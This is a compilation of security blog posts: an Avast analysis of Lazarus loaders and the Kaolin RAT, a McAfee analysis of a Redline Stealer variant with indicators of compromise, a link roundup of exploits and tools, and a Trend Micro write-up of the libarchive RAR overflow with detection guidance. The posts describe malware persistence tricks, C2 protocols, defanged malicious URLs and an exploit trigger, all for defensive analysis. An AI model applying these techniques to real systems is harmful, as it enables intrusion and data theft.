These folders serve as destinations for moving the binary blob, now renamed with a newly generated name and a ".cab" extension. RollSling loader will store the binary blob in the first created folder, and it will store a new temporary file, whose usage will be mentioned later, in the second created folder.  

The attacker utilizes the "Package Cache" folder, a common repository for software installation files, to better hide its malicious files in a folder full of legitimate files. In this approach, the attacker also leverages the ".cab" extension, which is the usual extension for the files located in the Package Cache folder. By employing this method, the attacker is trying to effectively avoid detection by relocating essential files to a trusted folder. 

In the end, the RollSling loader calls an exported function called "StartAction". This function is called with specific arguments, including information about the actual path of the RollFling loader, the path where the binary blob resides, and the path of a temporary file to be created by the RollMid loader. 

Figure 2: Looking for a binary blob in the same folder as the RollFling loader

RollMid

The responsibility of the RollMid loader lies in loading key components of the attack and configuration data from the binary blob, while also establishing communication with a C&C server. 

The binary blob, containing essential components and configuration data, serves as a critical element in the proper execution of the attack chain. Unfortunately, our attempts to obtain this binary blob were unsuccessful, leading to gaps in our full understanding of the attack. However, we were able to retrieve the RollMid loader and certain binaries stored in memory. 

Within the binary blob, the RollMid loader is a fundamental component located at the beginning (see Figure 3). The first 4 bytes in the binary blob describe the size of the RollMid loader. There are two more binaries stored in the binary blob after the RollMid loader as well as configuration data, which is located at the very end of the binary blob. These two other binaries and configuration data are additionally subject to compression and AES encryption, adding layers of security to the stored information.  

As depicted, the first four bytes enclosed in the initial yellow box describe the size of the RollMid loader. This specific information is also important for parsing, enabling the transition to the subsequent section within the binary blob. 

Located after the RollMid loader, there are two 4-byte values, distinguished by yellow and green colors. The former corresponds to the size of FIRST_ENCRYPTED_DLL section, while the latter (green box) signifies the size of SECOND_ENCRYPTED_DLL section. Notably, the second 4-byte value in the green box serves a dual purpose, not only describing a size but also at the same time constituting a part of the 16-byte AES key for decrypting the FIRST_ENCRYPTED_DLL section. Thanks to the provided information on the sizes of each encrypted DLL embedded in the binary blob, we are now equipped to access the configuration data section placed at the end of the binary blob. 

Figure 3: Structure of the Binary blob 

The RollMid loader requires the FIRST_DLL_BINARY for proper communication with the C&C server. However, before loading FIRST_DLL_BINARY, the RollMid loader must first decrypt the FIRST_ENCRYPTED_DLL section. 

The decryption process applies the AES algorithm, beginning with the parsing of the decryption key alongside an initialization vector to use for AES decryption. Subsequently, a decompression algorithm is applied to further extract the decrypted content. Following this, the decrypted FIRST_DLL_BINARY is loaded into memory, and the DllMain function is invoked to initialize the networking library. 

Unfortunately, as we were unable to obtain the binary blob, we didn’t get a chance to reverse engineer the FIRST_DLL_BINARY. This presents a limitation in our understanding, as the precise implementation details for the imported functions in the RollMid loader remain unknown. These imported functions include the following: 

  • SendDataFromUrl 
  • GetImageFromUrl 
  • GetHtmlFromUrl 
  • curl_global_cleanup 
  • curl_global_init 

After reviewing the exported functions by their names, it becomes apparent that these functions are likely tasked with facilitating communication with the C&C server. FIRST_DLL_BINARY also exports other functions beyond these five, some of which will be mentioned later in this blog.  

The names of these five imported functions imply that FIRST_DLL_BINARY is built upon the curl library (as can be seen by the names curl_global_cleanup and curl_global_init). In order to establish communication with the C&C servers, the RollMid loader employs the imported functions, utilizing HTTP requests as its preferred method of communication. 

The rationale behind opting for the curl library for sending HTTP requests may stem from various factors. One notable reason could be the efficiency gained by the attacker, who can save time and resources by leveraging the HTTP communication protocol. Additionally, the ease of use and seamless integration of the curl library into the code further support its selection. 

Prior to initiating communication with the C&C server, the malware is required to generate a dictionary filled with random words, as illustrated in Figure 4 below. Given the extensive size of the dictionary (which contains approximately hundreds of elements), we have included only a partial screenshot for reference purposes. The subsequent sections of this blog will delve into a comprehensive exploration of the role and application of this dictionary in the overall functionality of malware. 

Figure 4: Filling the main dictionary 

To establish communication with the C&C server, as illustrated in Figure 5, the malware must obtain the initial C&C addresses from the CONFIGURATION_DATA section. Upon decrypting these addresses, the malware initiates communication with the first layer of the C&C server through the GetHtmlFromUrl function, presumably using an HTTP GET request. The server responds with an HTML file containing the address of the second C&C server layer. Subsequently, the malware engages in communication with the second layer, employing the imported GetImageFromUrl function. The function name implies this performs a GET request to retrieve an image. 

In this scenario, the attackers employ steganography to conceal crucial data for use in the next execution phase. Regrettably, we were unable to ascertain the nature of the important data concealed within the image received from the second layer of the C&C server. 

Figure 5: Communication with C&C servers 

We are aware that the concealed data within the image serves as a parameter for a function responsible for transmitting data to the third C&C server. Through our analysis, we have determined that the acquired data from the image corresponds to another address of the third C&C server.  Communication with the third C&C server is initiated with a POST request.  

Malware authors strategically employ multiple C&C servers as part of their operational tactics to achieve specific objectives. In this case, the primary goal is to obtain an additional data blob from the third C&C server, as depicted in Figure 5, specifically in step 7. Furthermore, the use of different C&C servers and diverse communication pathways adds an additional layer of complexity for security tools attempting to monitor such activities. This complexity makes tracking and identifying malicious activities more challenging, as compared to scenarios where a single C&C server is employed.

The malware then constructs a URL, by creating the query string with GET parameters (name/value pairs). The parameter name consists of a randomly selected word from the previously created dictionary and the value is generated as a random string of two characters. The format is as follows: 

"%addressOfThirdC&C%?%RandomWordFromDictonary%=%RandomString%" 

The URL generation involves the selection of words from a generated dictionary, as opposed to entirely random strings. This intended choice aims to enhance the appearance and legitimacy of the URL. The words, carefully curated from the dictionary, contribute to the appearance of a clean and organized URL, resembling those commonly associated with authentic applications. The terms such as "atype", "User",” or "type" are not arbitrary but rather thoughtfully chosen words from the created dictionary. By utilizing real words, the intention is to create a semblance of authenticity, making the HTTP POST payload appear more structured and in line with typical application interactions.  

Before dispatching the POST request to the third layer of the C&C server, the request is populated with additional key-value tuples separated by standard delimiters “?” and “=” between the key and value. In this scenario, it includes: 

%RandomWordFromDictonary %=%sleep_state_in_minutes%?%size_of_configuration_data%  

The data received from the third C&C server is parsed. The parsed data may contain an integer, describing sleep interval, or a data blob. This data blob is encoded using the base64 algorithm. After decoding the data blob, where the first 4 bytes indicate the size of the first part of the data blob, the remainder represents the second part of the data blob. 

The first part of the data blob is appended to the SECOND_ENCRYPTED_DLL as an overlay, obtained from the binary blob. After successfully decrypting and decompressing SECOND_ENCRYPTED_DLL, the process involves preparing the SECOND_ENCRYPTED_DLL, which is a Remote Access Trojan (RAT) component to be loaded into memory and executed with the specific parameters. 

The underlying motivation behind this maneuver remains shrouded in uncertainty. It appears that the attacker, by choosing this method, sought to inject a degree of sophistication or complexity into the process. However, from our perspective, this approach seems to border on overkill. We believe that a simpler method could have sufficed for passing the data blob to the Kaolin RAT.  

The second part of the data blob, once decrypted and decompressed, is handed over to the Kaolin RAT component, while the Kaolin RAT is executed in memory. Notably, the decryption key and initialization vector for decrypting the second part of the data blob reside within its initial 32 bytes.  

Kaolin RAT

A pivotal phase in orchestrating the attack involves the utilization of a Remote Access Trojan (RAT). As mentioned earlier, this Kaolin RAT is executed in memory and configured with specific parameters for proper functionality. It stands as a fully equipped tool, including file compression capabilities.  

However, in our investigation, the Kaolin RAT does not mark the conclusion of the attack. In the previous blog post, we already introduced another significant component – the FudModule rootkit. Thanks to our robust telemetry, we can confidently assert that this rootkit was loaded by the aforementioned Kaolin RAT, showcasing its capabilities to seamlessly integrate and deploy FudModule. This layered progression underscores the complexity and sophistication of the overall attack strategy. 

One of the important steps is establishing secure communication with the RAT’s C&C server, encrypted using the AES encryption algorithm. Despite the unavailability of the binary containing the communication functionalities (the RAT also relies on functions imported from FIRST_DLL_BINARY for networking), our understanding is informed by other components in the attack chain, allowing us to make certain assumptions about the communication method. 

The Kaolin RAT is loaded with six arguments, among which a key one is the base address of the network module DLL binary, previously also used in the RollMid loader. Another argument includes the configuration data from the second part of the received data blob. 

For proper execution, the Kaolin RAT needs to parse this configuration data, which includes parameters such as: 

  • Duration of the sleep interval. 
  • A flag indicating whether to collect information about available disk drives. 
  • A flag indicating whether to retrieve a list of active sessions on the remote desktop. 
  • Addresses of additional C&C servers. 

In addition, the Kaolin RAT must load specific functions from FIRST_DLL_BINARY, namely: 

  • SendDataFromURL 
  • ZipFolder 
  • UnzipStr 
  • curl_global_cleanup 
  • curl_global_init 

Although the exact method by which the Kaolin RAT sends gathered information to the C&C server is not precisely known, the presence of exported functions like "curl_global_cleanup" and "curl_global_init" suggests that the sending process involves again API calls from the curl library. 

For establishing communication, the Kaolin RAT begins by sending a POST request to the C&C server. In this first POST request, the malware constructs a URL containing the address of the C&C server. This URL generation algorithm is very similar to the one used in the RollMid loader. To the C&C address, the Kaolin RAT appends a randomly chosen word from the previously created dictionary (the same one as in the RollMid loader) along with a randomly generated string. The format of the URL is as follows: 

"%addressOfC&Cserver%?%RandomWordFromDictonary%=%RandomString%" 

The malware further populates the content of the POST request, utilizing the default "application/x-www-form-urlencoded" content type. The content of the POST request is subject to AES encryption and subsequently encoded with base64. 

Within the encrypted content, which is appended to the key-value tuples (see the form below), the following data is included (EncryptedContent)

  • Installation path of the RollFling loader and path to the binary blob 
  • Data from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Iconservice 
  • Kaolin RAT process ID 
  • Product name and build number of the operating system. 
  • Addresses of C&C servers. 
  • Computer name 
  • Current directory 

In the POST request with the encrypted content, the malware appends information about the generated key and initialization vector necessary for decrypting data on the backend. This is achieved by creating key-value tuples, separated by “&” and “=” between the key and value. In this case, it takes the following form: 

%RandomWordFromDictonary%=%TEMP_DATA%&%RandomWordFromDictonary%=%IV%%KEY%&%RandomWordFromDictonary%=%EncryptedContent%&%RandomWordFromDictonary%=%EncryptedHostNameAndIPAddr% 

Upon successfully establishing communication with the C&C server, the Kaolin RAT becomes prepared to receive commands. The received data is encrypted with the aforementioned generated key and initialization vector and requires decryption and parsing to execute a specific command within the RAT. 

When the command is processed the Kaolin RAT relays back the results to the C&C server, encrypted with the same AES key and IV. This encrypted message may include an error message, collected information, and the outcome of the executed function. 

The Kaolin RAT has the capability to execute a variety of commands, including: 

  • Updating the duration of the sleep interval. 
  • Listing files in a folder and gathering information about available disks. 
  • Updating, modifying, or deleting files. 
  • Changing a file’s last write timestamp. 
  • Listing currently active processes and their associated modules. 
  • Creating or terminating processes. 
  • Executing commands using the command line. 
  • Updating or retrieving the internal configuration. 
  • Uploading a file to the C&C server. 
  • Connecting to the arbitrary host. 
  • Compressing files. 
  • Downloading a DLL file from C&C server and loading it in memory, potentially executing one of the following exported functions: 
    • _DoMyFunc 
    • _DoMyFunc2 
    • _DoMyThread (executes a thread) 
    • _DoMyCommandWork 
  • Setting the current directory.

Conclusion

Our investigation has revealed that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Thanks to our robust telemetry, we were able to uncover almost the entire attack chain, thoroughly analyzing each stage. The Lazarus group’s level of technical sophistication was surprising and their approach to engaging with victims was equally troubling. It is evident that they invested significant resources in developing such a complex attack chain. What is certain is that Lazarus had to innovate continuously and allocate enormous resources to research various aspects of Windows mitigations and security products. Their ability to adapt and evolve poses a significant challenge to cybersecurity efforts. 

Indicators of Compromise (IoCs) 

ISO
b8a4c1792ce2ec15611932437a4a1a7e43b7c3783870afebf6eae043bcfade30 

RollFling
a3fe80540363ee2f1216ec3d01209d7c517f6e749004c91901494fb94852332b 

NLS files
01ca7070bbe4bfa6254886f8599d6ce9537bafcbab6663f1f41bfc43f2ee370e
7248d66dea78a73b9b80b528d7e9f53bae7a77bad974ededeeb16c33b14b9c56 

RollSling
e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f
f47f78b5eef672e8e1bd0f26fb4aa699dec113d6225e2fcbd57129d6dada7def 

RollMid
9a4bc647c09775ed633c134643d18a0be8f37c21afa3c0f8adf41e038695643e 

Kaolin RAT
a75399f9492a8d2683d4406fa3e1320e84010b3affdff0b8f2444ac33ce3e690 

The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.

Fireside Chat: Horizon3.ai and JTI Cybersecurity

Horizon3.ai Principal Security SME Stephen Gates and JTI Cybersecurity Principal Consultant Jon Isaacson discuss:

– What JTI does to validate things like access control, data loss prevention, ransomware protection, and intrusion detection approaches.
– How #pentesting and red team exercises allow orgs to validate the effectiveness of their security controls.
– Why offensive operations work best to discover and mitigate exploitable vulnerabilities in their client’s infrastructures.

The post Fireside Chat: Horizon3.ai and JTI Cybersecurity appeared first on Horizon3.ai.

Redline Stealer: A Novel Approach

Authored by Mohansundaram M and Neil Tyagi


A new packed variant of the Redline Stealer trojan was observed in the wild, leveraging Lua bytecode to perform malicious behavior.

McAfee telemetry data shows this malware strain is very prevalent, covering North America, South America, Europe, and Asia and reaching Australia.

Infection Chain

 
  • GitHub is being abused to host the malware file at Microsoft’s official account in the vcpkg repository https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip

  • McAfee Web Advisor blocks access to this malicious download
  • Cheat.Lab.2.7.2.zip is a zip file with hash 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
  • The zip file contains an MSI installer.

  • The MSI installer contains 2 PE files and a purported text file.
  • Compiler.exe and lua51.dll are binaries from the Lua project. However, they are modified slightly by a threat actor to serve their purpose; they are used here with readme.txt (Which contains the Lua bytecode) to compile and execute at Runtime.
  • Lua JIT is a Just-In-Time Compiler (JIT) for the Lua programming language.
  • The magic number 1B 4C 4A 02 typically corresponds to Lua 5.1 bytecode.
  • The above image is readme.txt, which contains the Lua bytecode. This approach provides the advantage of obfuscating malicious stings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor.
  • Upon execution, the MSI installer displays a user interface.

  • During installation, a text message is displayed urging the user to spread the malware by installing it onto a friend’s computer to get the full application version.

  • During installation, we can observe that three files are being written to Disk to C:\program Files\Cheat Lab Inc\ Cheat Lab\ path.

  • Below, the three files are placed inside the new path.

 

    • Here, we see that compiler.exe is executed by msiexec.exe and takes readme.txt as an argument. Also, the Blue Highlighted part shows lua51.dll being loaded into compiler.exe. Lua51.dll is a supporting DLL for compiler.exe to function, so the threat actor has shipped the DLL along with the two files.
    • During installation, msiexec.exe creates a scheduled task to execute compiler.exe with readme.txt as an argument.
    • Apart from the above technique for persistence, this malware uses a 2nd fallback technique to ensure execution.
    • It copies the three files to another folder in program data with a very long and random path.
  • Note that the name compiler.exe has been changed to NzUW.exe.
  • Then it drops a file ErrorHandler.cmd at C:\Windows\Setup\Scripts\
  • The contents of cmd can be seen here. It executes compiler.exe under the new name of NzUw.exe with the Lua byte code as a parameter.

  • Executing ErrorHandler.cmd uses a LolBin in the system32 folder. For that, it creates another scheduled task.

 

    • The above image shows a new task created with Windows Setup, which will launch C:\Windows\system32\oobe\Setup.exe without any argument.
    • Turns out, if you place your payload in c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd, c:\WINDOWS\system32\oobe\Setup.exe will load it whenever an error occurs.

 

Source: Add a Custom Script to Windows Setup | Microsoft Learn

    • c:\WINDOWS\system32\oobe\Setup.exe is expecting an argument. When it is not provided, it causes an error, which leads to the execution of ErrorHandler.cmd, which executes compiler.exe, which loads the malicious Lua code.
    • We can confirm this in the below process tree.

We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with ErrorHandler.cmd script as argument, which runs NzUw.exe(compiler.exe)

    • It then checks the IP from where it is being executed and uses ip-API to achieve that.

 

    • We can see the network packet from api-api.com; this is written as a JSON object to Disk in the inetCache folder.
    • We can see procmon logs for the same.
  • We can see JSON was written to Disk.

C2 Communication and stealer activity

    • Communication with c2 occurs over HTTP.
    • We can see that the server sent the task ID of OTMsOTYs for the infected machine to perform. (in this case, taking screenshots)
    • A base64 encoded string is returned.
    • An HTTP PUT request was sent to the threat actors server with the URL /loader/screen.
    • IP is attributed to the redline family, with many engines marking it as malicious.

  • Further inspection of the packet shows it is a bitmap image file.
  • The name of the file is Screen.bmp
  • Also, note the unique user agent used in this put request, i.e., Winter

  • After Dumping the bitmap image resource from Wireshark to disc and opening it as a .bmp(bitmap image) extension, we see.
  • The screenshot was sent to the threat actors’ server.

Analysis of bytecode File

  • It is challenging to get the true decomplication of the bytecode file.
  • Many open source decompilers were used, giving a slightly different Lua script.
  • The script file was not compiling and throwing some errors.

  • The script file was sensitized based on errors so that it could be compiled.
  • Debugging process

  • One table (var_0_19) is populated by passing data values to 2 functions.
  • In the console output, we can see base64 encoded values being stored in var_0_19.
  • These base64 strings decode to more encoded data and not to plain strings.

  • All data in var_0_19 is assigned to var_0_26

    • The same technique is populating 2nd table (var_0_20)
    • It contains the substitution key for encoded data.
    • The above pic is a decryption loop. It iterates over var_0_26 element by element and decrypts it.
    • This loop is also very long and contains many junk lines.
    • The loop ends with assigning the decrypted values back to var_0_26.

 

    • We place the breakpoint on line 1174 and watch the values of var_0_26.
    • As we hit the breakpoint multiple times, we see more encoded data decrypted in the watch window.

 

  • We can see decrypted strings like Tamper Detected! In var_0_26

Loading luajit bytcode:

Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.

It loads the library using the Lua_openlib function and loads the debug, io, math,ffi, and other supported libraries,

Lua jit bytecode loaded using the luaL_loadfile export function from lua51. It uses the fread function to read the jit bytecode, and then it moves to the allocated memory using the memmove function.

 

The bytecode from the readme. Text is moved randomly, changing the bytecode from one offset to another using the memmove API function. The exact length of 200 bytes from the Jit bytecode is copied using the memmove API function.


It took table values and processed them using the below floating-point arithmetic and xor instruction.

It uses memmove API functions to move the bytes from the source to the destination buffer.

After further analysis, we found that c definition for variable and arguments which will be used in this script.

We have seen some API definitions, and it uses ffi for directly accessing Windows API functions from Lua code, examples of defining API functions,

 


It creates the mutex with the name winter750 using CreateMutexExW.

It Loads the dll at Runtime using the LdrLoaddll function from ntdll.dll. This function is called using luajit ffi.

It retrieves the MachineGuid from the Windows registry using the RegQueryValueEx function by using ffi. Opens the registry key “SOFTWARE\\Microsoft\\Cryptography” using RegOpenKeyExA—queries the value of “MachineGuid” from the opened registry key.

It retrieves the ComputerName from the Windows registry using the GetComputerNameA function using ffi.

It gathers the following information and sends it to the C2 server.

It also sends the following information to the c2 server,

  • In this blog, we saw the various techniques threat actors use to infiltrate user systems and exfiltrate their data.

Indicators of Compromise

Cheat.Lab.2.7.2.zip 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610
Cheat.Lab.2.7.2.zip https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip

 

lua51.dll 873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997
readme.txt 751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad
compiler.exe dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a
Redline C2 213[.]248[.]43[.]58
Trojanised Git Repo hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip

 

The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.

Congratulations to the Top MSRC 2024 Q1 Security Researchers! 

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers. The top three researchers of the 2024 Q1 Security Researcher Leaderboard are Yuki Chen, VictorV, and Nitesh Surana! Check out the full list of researchers recognized this quarter here.

Last Week in Security (LWiS) - 2024-04-16

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2024-04-08 to 2024-04-16.

News

Techniques and Write-ups

Tools and Exploits

  • UserManagerEoP - PoC for CVE-2023-36047. Patched last week. Should still be viable if you're on an engagement right now!
  • Gram - Klarna's own threat model diagramming tool
  • Shoggoth - Shoggoth is an open-source project based on C++ and asmjit library used to encrypt given shellcode, PE, and COFF files polymorphically.
  • ExploitGSM - Exploit for 6.4 - 6.5 Linux kernels and another exploit for 5.15 - 6.5. Zero days when published.
  • Copilot-For-Security - Microsoft Copilot for Security is a generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant to responsible AI principles
  • CVE-2024-21378 - DLL code for testing CVE-2024-21378 in MS Outlook. Using this with Ruler.
  • ActionsTOCTOU - Example repository for GitHub Actions Time of Check to Time of Use (TOCTOU vulnerabilities).
  • obfus.h - obfus.h is a macro-only library for compile-time obfuscating C applications, designed specifically for the Tiny C (tcc). It is tailored for Windows x86 and x64 platforms and supports almost all versions of the compiler.
  • Wareed DNS C2 is a Command and Control (C2) that utilizes the DNS protocol for secure communications between the server and the target. Designed to minimize communication and limit data exchange, it is intended to be a first-stage C2 to persist in machines that don't have access to the internet via HTTP/HTTPS, but where DNS is allowed.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • Can you hack your government? - A list of governments with Vulnerability Disclosure Policies.
  • GoAlert - Open source on-call scheduling, automated escalations, and notifications so you never miss a critical alert
  • AssetViz - AssetViz simplifies the visualization of subdomains from input files, presenting them as a coherent mind map. Ideal for penetration testers and bug bounty hunters conducting reconnaissance, AssetViz provides intuitive insights into domain structures for informed decision-making.
  • GMER - the art of exposing Windows rootkits in kernel mode - GMER is an anti-rootkit tool used to detect and combat rootkits, specifically focusing on the prevalent kernel mode rootkits, and remains effective despite many anti-rootkits losing relevance with advancements in Windows security.
  • AiTM Phishing with Azure Functions - The deployment of a serverless AiTM phishing toolkit using Azure Functions to phish Entra ID credentials and cookies
  • orange - Orange Meets is a demo application built using Cloudflare Calls. To build your own WebRTC application using Cloudflare Calls. Combine this with some OpenVoice or Real-Time-Voice-Cloning. Scary.
  • awesome-secure-defaults - Share this with your development teams and friends or use it in your own tools. "Awesome secure by default libraries to help you eliminate bug classes!"
  • NtWaitForDebugEvent + WaitForMultipleObjects - Using these two together to wait for debug events from multiple debugees at once.
  • taranis-ai - Taranis AI is an advanced Open-Source Intelligence (OSINT) tool, leveraging Artificial Intelligence to revolutionize information gathering and situational analysis.
  • MSFT_DriverBlockList - Repository of Microsoft Driver Block Lists based off of OS-builds.
  • HSC24RedTeamInfra - Slides and Codes used for the workshop Red Team Infrastructure Automation at HackSpanCon2024.
  • SuperMemory - Build your own second brain with supermemory. It's a ChatGPT for your bookmarks. Import tweets or save websites and content using the chrome extension.
  • Kubenomicon - An open source offensive security focused threat matrix for kubernetes with an emphasis on walking through how to exploit each attack.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

CVE-2024-20697: Windows Libarchive Remote Code Execution Vulnerability

In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Jason McFadyen of the Trend Micro Research Team detail a recently patched remote code execution vulnerability in Microsoft Windows. This bug was originally discovered by the Microsoft Offensive Research & Security Engineering team. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library. The following is a portion of their write-up covering CVE-2024-20697, with a few minimal modifications.


An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive.

A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.

The Vulnerability

The RAR file format supports data compression, error recovery, and multiple volume spanning. Several versions of the RAR format exist: RAR1.3, RAR1.5, RAR2, RAR3, and the most recent version, RAR5. Different compression and decompression algorithms are used for different versions of RAR.

The following describes the RAR format used by versions 1.5, 2.x, and 3.x. A RAR archive consists of a series of variable-length blocks.

Each block begins with a header. The following table is the common structure of a RAR block header:

The RarBlock Marker is the first block of a RAR archive and serves as the signature of a RAR formatted file:

This block always contains the following byte sequence at the beginning of every RAR file:

           0x52 0x61 0x72 0x21 0x1A 0x07 0x00 (ASCII: "Rar!\x1A\x07\x00")

The ArcHeader is the second block in a RAR file and has the following structure:

The ArcHeader block is followed by one or more FileHeader blocks. These blocks have the following structure:

Note that the above offsets are relative to the existence of the optional fields.

The EndBlock block will signify the end of the RAR archive. This block has the following structure:

For each FileHeader block in the RAR archive, if the Method field is not set to "Store" (0x30), then the Data field will contain the compressed file data. The method of decompression depends on the RAR version used to compress the data. The RAR version needed to extract the compressed data is recorded in the UnpVer field of the FileHeader block.

Of relevance to this report is the RAR extraction method used by RAR format version 2.9 (a.k.a. RAR4), which is used when the UnpVer field is set to 29. The compressed data may be compressed either using the Lempel-Ziv (LZ) algorithm or using Prediction by Partial Matching (PPM) compression. This report will not describe in full detail the extraction algorithm, but only summarize the relevant parts for understanding the vulnerability. For a reference implementation of the extraction algorithm, see the Unpack::Unpack29() function in the UnRAR source code.

When the libarchive library attempts to extract the contents of a file from a RAR archive, if the file data is compressed (i.e. the Method field is not set to "Store"), the function read_data_compressed() will be called to extract the compressed data. The compressed data is composed of multiple blocks, each of which can be compressed using the LZ algorithm (denoted by the first bit of the block set to 0) or using PPM compression (denoted by the first bit of the block set to 1). Initially, the function parse_codes() will be called to decode the tables necessary to extract the file data. If a block of data compressed using the LZ algorithm is encountered, the expand() function will be called to decompress the data. In the expand() function, symbols are read from the compressed data by calling read_next_symbol() in a loop. In the function read_next_symbol(), the symbol will be decoded according to the Huffman table decoded in function parse_codes().

If the decoded symbol is 257, the function read_filter() will be called to read a RARVM filter, which has the following structure:

Note that the above offsets are relative to the existence of the optional fields.

The calculation of the size of the Code field is as follows: If the lowest 3 bits of the Flags field (will be referred to as LENGTH) are less than 6, the code size is (LENGTH + 1). If LENGTH is set to 6, the code size is (LengthExt1 + 7). If LENGTH is set to 7, the code size is (LengthExt1 << data-preserve-html-node="true" 8) | LengthExt2. After the code length is calculated and the code itself is copied into a buffer, the code, its length, and the filter flags are sent to the parse_filter() function to parse the code section.

Within the code section, numbers are parsed by calling the function membr_next_rarvm_number(). This function reads 2 bits, and according to their value, determines how many bits to read to parse the value. If the first 2 bits are 0, 4 value bits will be read; if they are 1, 8 value bits will be read; if they are 2, 16 value bits will be read; and if they are 3, 32 value bits will be read.

Function parse_filter() will parse the code section, which has the following structure:

Note that if the READ_REGISTERS flag is not set, the registers will be initialized, such that the 5th register is set to the block length, which is either read from the code section (if the READ_BLOCK_LENGTH flag is set), or carried over from the block length of the previous filter.

After these fields are parsed in parse_filter(), the ByteCode field and its length are sent to the function compile_program(). In this function, the first byte of the bytecode is verified to be equal to the XOR of all other bytes in the bytecode. If true, it will set the fingerprint field of the rar_program_code struct to the value of the CRC-32 algorithm run on the full bytecode, combined with the bytecode length shifted left 32 bits.

Back in the function parse_filter(), after all fields are calculated for the filter, therar_filter struct will be initialized by calling create_filter() with the rar_program_code struct containing the fingerprint field and the register values calculated. These values will be set to the prog field and the initialregisters fields of the rar_filter struct, respectively.

Once processing of the filter is done, function run_filters() is called to run the parsed filter. This function initializes the vm field of the rar_filters struct with a structure of type rar_virtual_machine. This structure contains a registers field, which is an array of 8 integers, and a memory field of size 0x40004. Then, each filter is executed by calling execute_filter(). If the fingerprint field of the rar_program_code struct associated with the executed filter is equal to either 0x35AD576887 or 0x393CD7E57E, the execute_filter_e8() function is called. This function reads the block length from the 5th field of the initialregisters array. Then, a loop is run for replacing instances of 0xE8 and/or 0xE9 within the VM memory, with the block length used as the loop exit condition.

An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive. Specifically, if the archive contains a RARVM filter whose fingerprint field is calculated as either 0x35AD576887 or 0x393CD7E57E, it will be executed by calling execute_filter_e8(). If the 5th register of the filter is set to a block length of 4, the loop condition in this function, which is set to the block length minus 5, will overflow to 0xFFFFFFFF. Since the VM memory has a size of 0x40004, this will result in memory accesses that are out of the bounds of the heap-based buffer representing the VM memory.

A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive, containing a RARVM filter that has its 5th register set to 4. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.

Notes:

• All multi-byte integers are in little-endian byte order.
• All offsets and sizes are in bytes unless otherwise specified.
• Since there is no official documentation of the RAR4 format, the description is based on the UnRAR and libarchive source code. Field names are either copied from source code or given based on functionality.

Detection Guidance

To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the common ports where a RAR archive might be sent, such as FTP, HTTP, SMTP, IMAP, SMB, and POP3.

The detection device must look for the transfer of RAR files and be able to parse the RAR file format. Currently, there is no official documentation of the RAR file format. This detection guidance is based on the source code for extracting RAR archives provided by the UnRAR program and the libarchive library.

The common structure of a RAR block header is detailed above. The detection device must first look for a RarBlock Marker, which is the first block of a RAR archive and serves as the signature of a RAR formatted file:

The detection device can identify this block by looking for the following byte sequence:

          0x52 0x61 0x72 0x21 0x1A 0x07 0x00 ("Rar!\x1A\x07\x00")

If found, the device must then identify the ArcHeader, which is the second block in a RAR file and is detailed above. The ArcHeader block is followed by one or more FileHeader blocks, whose structure is also detailed above. Note that the above offsets are relative to the existence of the optional fields.

The detection device must parse each FileHeader block and inspect its Method field. If the value of the Method field is greater than 0x30, the detection device must inspect the Data field of the FileHeader block, containing the compressed file data. The compressed data may be compressed either using the Lempel-Ziv (LZ) algorithm or using Prediction by Partial Matching (PPM) compression. This detection guidance will not describe in full detail the extraction algorithm. For a reference implementation of the extraction algorithm, see the Unpack::Unpack29() function in the UnRAR source code.

The compressed data is composed of multiple blocks, each of which can be compressed using the LZ algorithm (denoted by the first bit of the block set to 0) or using PPM compression (denoted by the first bit of the block set to 1). The detection device must extract each block according to the algorithm used to compress it. If a block compressed using the LZ algorithm is encountered, the detection device must decode the Huffman tables from the beginning of the compressed data. The detection device must then iterate over the remaining compressed data and decode each symbol based on the generated Huffman tables. If the symbol 257 is encountered, the following data must be parsed as a RARVM filter, which has the following structure:

Note that the above offsets are relative to the existence of the optional fields.

